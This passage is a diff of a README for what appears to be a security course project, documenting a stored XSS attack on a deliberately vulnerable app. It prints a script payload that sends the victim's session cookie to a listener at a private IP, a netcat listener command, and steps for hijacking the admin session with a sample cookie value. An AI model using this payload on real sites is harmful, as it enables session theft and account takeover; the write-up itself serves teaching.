BenjaminStienlet/cybersecuritybase-project/README.md

     ```
     <script>document.write('<img src="http://192.168.0.117:1234/' + document.cookie + '">')</script>
     ```
-3. Start a netcat server using the command `nc -lp 1234`.
+3. Start a netcat server using the command `nc -lp 1234` on the specified host.
 When a user opens the attendees page, a request is sent to this server:

     ![Result of XSS](https://raw.githubusercontent.com/BenjaminStienlet/cybersecuritybase-project/master/images/XSS_session_cookie.png)
 4. We now can take over the session of this user by changing our own session cookie using `document.cookie="JSESSIONID=E0ED84B16865028DF09E522DC8B8DDC8"` in the browser console.
 This way we are able to steal the session of the admin user when this user logs in.